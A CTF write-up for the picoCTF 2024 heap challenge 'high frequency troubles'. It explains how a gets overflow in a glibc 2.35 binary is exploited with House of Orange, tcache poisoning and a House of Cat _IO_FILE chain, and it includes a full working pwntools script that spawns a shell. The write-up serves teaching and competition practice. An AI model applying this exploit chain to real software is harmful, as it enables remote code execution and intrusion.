Here’s my writeup for the hardest challenge in picoCTF 2024 - high frequency troubles. I think I’m the 24th person to solve this challenge in the competition after struggling for like 4 days during the competition. I am one of the 31 teams that solved the problem, out of a total of more than 7000 teams. I’m definitely really proud of myself!

In this challenge, we have to combine a trick from an old exploit technique - House of Orange and some really new things in Glibc 2.35 to get shell. (Since there’s no function pointer in glibc 2.35, RCE is very hard…) Definitely learned a lot from this challenge!

In the end, I believe this is the unintended solution.

tl;dr

Use “free top chunk” trick from house of orange to gain free primitive. Then use some disgusting heap feng shui and tcache poisoning to leak libc and overwrite stderr. Finally gain RCE using “house of cat” exploit chain by overwriting top chunk size and triggering __malloc_assert. Remember to fix corrupted unsorted bin size.

Challenge

Challenge environment: Glibc 2.35, protection are all on.

I only show the important parts of the challenge here.

struct
{
    size_t sz;
    uint64_t data[];
} typedef pkt_t;
//...

// gcc main.c -o hft -g

int main()
{
    //...

    for (;;)
    {
        size_t sz = 0;
        fread(&sz, sizeof(size_t), 1, stdin);

        pkt_t *pkt = malloc(sz);
        pkt->sz = sz;
        gets(&pkt->data); //<---gets


        switch (pkt->data[0])
        {
        case PKT_OPT_PING:
            putl(PKT_MSG_DATA, "PONG_OK");
            break;
        case PKT_OPT_ECHO: // <--- only this case is important

            putl(PKT_MSG_DATA, (char *)&pkt->data[1]);
            break;
        default:
            putl(PKT_MSG_INFO, "E_INVAL");
            break;
        }
    }
    //...

}

First, you can input a size_t “size”, and then it will malloc a block of memory of that given size.

The first 8 bytes of this memory block will be the size we just input, and the next content will be read using gets. (This is the vulnerability of course)

The first 8 bytes of the “content” will be the “mode flag”.

If mode equals 1, it will print the content after the mode flag. The other options are not important.

|size|mode|rest of the content...(this part will be printed if mode equals 1)

Vulnerability analysis

The vulnerability is clear: we can easily overflow the buffer using gets.

The difficulties in this problem are:

  1. You cannot free any chunks.

  2. You can only operate on one chunk of memory at a time; you can’t perform arbitrary operations like heap note challenges.

  3. gets will have a NULL byte, making it seem like leaking addresses is impossible.

  4. In glibc 2.35, many function pointers have disappeared, making RCE challenging.

Exploitation Plan

However, these four difficulties are solvable.

  1. It’s well known that we can modify size of top chunk to a certain small size (< 0x1000 I think) to free top chunk since glibc thinks the top chunk is too small and it’ll be freed, which is a classic trick from House of Orange. Though the _IO_FILE exploit in the original House of Orange (hijacking vtable) isn’t working anymore, we can still use this “free top chunk” trick.

  2. However we cannot go back to previous chunk to modify data like “heap note” challenges. What can we do now?

We can use heap feng shui to make the heap layout look like this:

---------------
Size a in tcache bin index 1
---------------
Size b in tcache bin index 0
---------------
Size a in tcache bin index 0
---------------
Size c in tcache bin index 0
---------------
Unsorted bin with libc address
---------------

We first take out size b to overwrite the next pointer of the bottom chunk (which has size a). Then we have poisoned tcache list of size a. (Next pointer of the third chunk, which is the first chunk in tcache list of size a, from the top is modified) Now we have a tcache poisoning so that we can allocate nearly everywhere by allocating size a!

  1. We can now first malloc to address of an unsorted bin header - 0x10. Then we input “mode” only (it’ll overwrite the header of the unsorted bin). However the “content” of this packet is now the beginning of the unsorted bin content, which is an libc address. We can leak libc now!

Remember to fix corrupted unsorted bin size using size c.

  1. Now we have libc leak and nearly arbitrary write using tcache poisoning. How to RCE?

We have two ways: the classic ROP or find a new way to exploit _IO_FILE structure.

The common and stable way is to leak the address of stack by reading the address stored at __libc_argv (argv address stored in libc). Then we can just hijack any return address to get shell. (with ROP of course)

The other “disgusting” way is that we can still exploit _IO_FILE structure in a new way! I use “house of cat” exploit chain here. We modify stderr to a specially crafted _IO_FILE structure and corrupt top chunk size and triggering __malloc_assert to trigger fflush(stderr) to gain RCE. I love these techniques.

House of Cat reference

Exploit Script

from pwn import *
import sys
import time

context.log_level = "debug"

# context.terminal = ["tmux", "splitw", "-h"]

context.arch = "amd64"

def one_gadget(filename: str) -> list:
    return [
        int(i)
        for i in __import__("subprocess")
        .check_output(["one_gadget", "--raw", filename])
        .decode()
        .split(" ")
    ]

# brva x = b *(pie+x)

# set follow-fork-mode

# p/x $fs_base

# vis_heap_chunks

# set debug-file-directory /usr/src/glibc/glibc-2.35

# directory /usr/src/glibc/glibc-2.35/malloc/

# handle SIGALRM ignore

if len(sys.argv) == 1:
    r = process("./hft_patched")
    if args.GDB:
        gdb.attach(
            r,
            "b __malloc_assert\nb system\nb__vfwprintf_internal\nb *__vfwprintf_internal+309",
        )
elif len(sys.argv) == 3:
    r = remote(sys.argv[1], sys.argv[2])
else:
    print("Usage: python3 {} [GDB | REMOTE_IP PORT]".format(sys.argv[0]))
    sys.exit(1)
s = lambda data: r.send(data)
sa = lambda x, y: r.sendafter(x, y)
sl = lambda data: r.sendline(data)
sla = lambda x, y: r.sendlineafter(x, y)
ru = lambda delims, drop=True: r.recvuntil(delims, drop)
uu32 = lambda data, num: u32(r.recvuntil[data](-num:).ljust(4, b"\x00"))
uu64 = lambda data, num: u64(r.recvuntil[data](-num:).ljust(8, b"\x00"))
leak = lambda name, addr: log.success("{} = {}".format(name, addr))
l64 = lambda: u64(r.recvuntil["\x7f"](-6:).ljust(8, b"\x00"))
l32 = lambda: u32(r.recvuntil["\xf7"](-4:).ljust(4, b"\x00"))

def malloc(size, data):
    sa("RES]\n", p64(size))
    sl(data)

malloc(0x18, p64(1) + b"a" *0x8 + p64(0xD51))
ru("[m:[")
ru("[m:[")
malloc(0xD48, p64(1) + b"bbbb")
ru("[m:[")
ru("[m:[")
malloc(0x18, b"\x01" + b"\x00"* 6)
ru("[m:[")
heap = u64(r.recv(6).ljust(8, b"\x00"))
leak("heap", hex(heap))

malloc(0x1000, p64(1) + b"cccc")  # Put to largebin
malloc(0xD00, p64(1) + b"dddd")  # consume

# Generate a tcache bin 0x260

malloc(0x18, p64(1) + b"e" *8 + p64(0x281))
malloc(0x278, p64(1) + b"f"* 7)

# Generate unsorted for size for top chunk

malloc(0x18, p64(1) + b"g" * 0x8 + p64(0xD61))
malloc(0xD58, p64(1) + b"hhhh")
malloc(0xD38, p64(1) + b"kkkk")

# Adjust top_chunk size

malloc(0x100, p64(1))

# Generate a different size tcache bin 0x150

malloc(0x18, p64(1) + b"i" *8 + p64(0x171))
malloc(0x168, p64(1) + b"j"* 7)

# Adjust size for unsorted bin

malloc(0xBE0, p64(1))

# Now use the same technique to poison tcache

malloc(0x18, p64(1) + b"i" *8 + p64(0x281))
malloc(0x281, p64(1) + b"j"* 7)

malloc(0xA00, p64(1))
malloc(0x18, p64(1) + b"k" *8 + p64(0x341))
malloc(0x341, p64(1) + b"l"* 7)

malloc(0x18, p64(1) + b"k" *8 + p64(0xC91))
malloc(0xC91, p64(1) + b"l"* 8)

def safe_linking(a, b):  # b is target a is base address
    return (a >> 12) ^ b

malloc(0x18, p64(0x261) + p64(safe_linking(heap + 0xCB0E0, 0))[:7])

malloc(
    0x140,
    b"6" * 0x21EE0 + p64(0x261) + p64(safe_linking(heap + 0x87AE0, heap + 0xCB0E0)),
)

malloc(0x250, p64(1))
malloc(0x250, p64[1](:7))

libc = l64() - 0x219CE0

leak("libc", hex(libc))

# fix unsorted bin

malloc(0x310, b"7" * 0x216C0 + p64[0xC51](:7))

# consume unsorted bin

malloc(0xC30, "6969")

# Generate a tcache bin 0x320

malloc(0x18, p64(1) + b"e" *8 + p64(0x341))
malloc(0x338, p64(1) + b"8"* 7)

# adjust top chunk

malloc(0x900, p64(1))

# Generate a tcache bin 0x370

malloc(0x18, p64(1) + b"e" *8 + p64(0x391))
malloc(0x389, p64(1) + b"9"* 7)

# adjust top chunk

malloc(0x8F0, p64(1))

# Generate a tcache bin 0x320

malloc(0x18, p64(1) + b"e" *8 + p64(0x341))
malloc(0x338, p64(1) + b"0"* 7)

# tcache poisoning

IO_stderr = libc + 0x21A860
malloc(
    0x360,
    b"z" * 0x22040
    + p64(0x321)
    + p64(safe_linking(heap + 0x131A20, IO_stderr - 0x10))[:7],
)

# house of cat exploit chain

fake_io_addr = heap + 0x131A30
fake_IO_FILE = b"\xd0\x06;sh;\x00\x00"
fake_IO_FILE += p64(0) *7
fake_IO_FILE += p64(1) + p64(2)
fake_IO_FILE += p64(fake_io_addr + 0xB0)
fake_IO_FILE += p64(libc + 0x0000000000050D60)  # call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x68, b"\x00")
fake_IO_FILE += p64(0)
fake_IO_FILE = fake_IO_FILE.ljust(0x88, b"\x00")
fake_IO_FILE += p64(heap + 0x1000)
fake_IO_FILE = fake_IO_FILE.ljust(0xA0, b"\x00")
fake_IO_FILE += p64(fake_io_addr + 0x30)
fake_IO_FILE = fake_IO_FILE.ljust(0xC0, b"\x00")
fake_IO_FILE += p64(1)  # mode=1
fake_IO_FILE = fake_IO_FILE.ljust(0xD8, b"\x00")
fake_IO_FILE += p64(
    libc + 0x2160C0 + 0x10
)  # vtable=IO_wfile_jumps+0x10  (vtable = IO_wfile_jumps + 0x30 for FSOP)
fake_IO_FILE += p64(0)* 6
fake_IO_FILE += p64(fake_io_addr + 0x40)
print("Len", len(fake_IO_FILE))
malloc(0x310, p64(1) + fake_IO_FILE)
malloc(0x310, p64(libc + 0x216600) + p64(fake_io_addr))

# Trigger __malloc_assert by modifying size of top chunk

malloc(0x18, p64(1) + b"O" * 0x8 + p64(0xD51))
malloc(0x1000, p64(1))
r.interactive()

Epilogue

The challenge has a hint and flag also mentioned that this is an unintended solution. The intended solution is to exploit mmap and tcache_perthread_struct. You can see here for more details.

The intended solution maybe like “partial overwrites to control tcache” and exploit tls as mentioned in the above blog post.

But I still think my solution is more interesting and resonable. (I mean, easy to come up with) All of these heap tricks are basic and well-known(?), but the combination of them is really interesting.

I hope you enjoy this writeup!